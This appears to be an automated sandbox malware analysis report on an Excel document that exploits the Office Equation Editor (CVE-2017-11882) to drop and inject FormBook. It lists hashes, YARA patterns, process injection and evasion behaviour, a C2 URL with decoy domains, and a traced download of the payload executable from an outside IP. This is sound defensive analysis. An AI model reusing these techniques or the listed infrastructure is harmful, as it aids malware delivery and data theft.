Play interactive tour

Edit tour

Windows Analysis Report oustanding 03082921.xlsx

Overview

General Information

Sample Name:	oustanding 03082921.xlsx
Analysis ID:	458692
MD5:	643fc978b1f9e32668a88202a7091266
SHA1:	ee970a6713bd017fd118a1eb54a237339c4fd579
SHA256:	e3469b3d96e6316114395abe8caef91aa9ac9edac2d701c2d64981d3c0dfc5f0
Tags:	FormbookVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Execution from Suspicious Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses netsh to modify the Windows network and firewall settings

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2768 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2444 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 3020 cmdline: 'C:\Users\Public\vbc.exe' MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)

vbc.exe (PID: 2224 cmdline: C:\Users\Public\vbc.exe MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)

explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

netsh.exe (PID: 1428 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: 784A50A6A09C25F011C3143DDD68E729)

cmd.exe (PID: 1144 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x4f0560:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x4f08ea:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x517780:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x517b0a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x4fc5fd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x52381d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4fc0e9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x523309:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x4fc6ff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x52391f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x4fc877:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x523a97:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x4f1302:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x518522:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x4fb364:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x522584:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x4f207a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x51929a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x5016ef:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x52890f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x502792:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4fe621:$sqlite3step: 68 34 1C 7B E1 0x4fe734:$sqlite3step: 68 34 1C 7B E1 0x525841:$sqlite3step: 68 34 1C 7B E1 0x525954:$sqlite3step: 68 34 1C 7B E1 0x4fe650:$sqlite3text: 68 38 2A 90 C5 0x4fe775:$sqlite3text: 68 38 2A 90 C5 0x525870:$sqlite3text: 68 38 2A 90 C5 0x525995:$sqlite3text: 68 38 2A 90 C5 0x4fe663:$sqlite3blob: 68 53 D8 7F 8C 0x4fe78b:$sqlite3blob: 68 53 D8 7F 8C 0x525883:$sqlite3blob: 68 53 D8 7F 8C 0x5259ab:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 3020	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7.2.vbc.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.vbc.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
7.2.vbc.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7.2.vbc.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.vbc.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 13.229.216.142, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2444, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2444, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2444, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3020

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Multi AV Scanner detection for domain / URL

Show sources

Source: adultpeace.com

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: oustanding 03082921.xlsx

ReversingLabs: Detection: 26%

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Source: 7.2.vbc.exe.400000.1.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: netsh.pdb source: vbc.exe, 00000007.00000002.2198845306.00000000004E9000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop ebx

Source: global traffic

DNS query: name: www.cleanxcare.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.229.216.142:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.229.216.142:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 69MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.adultpeace.com/p2io/

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Aug 2021 14:50:43 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Tue, 03 Aug 2021 14:09:54 GMTETag: "146600-5c8a83d6b91fb"Accept-Ranges: bytesContent-Length: 1336832Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d4 4c 09 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 70 10 00 00 f4 03 00 00 00 00 00 ca 8f 10 00 00 20 00 00 00 a0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 14 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 8f 10 00 4f 00 00 00 00 a0 10 00 a0 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 14 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 6f 10 00 00 20 00 00 00 70 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 f0 03 00 00 a0 10 00 00 f2 03 00 00 72 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 14 00 00 02 00 00 00 64 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 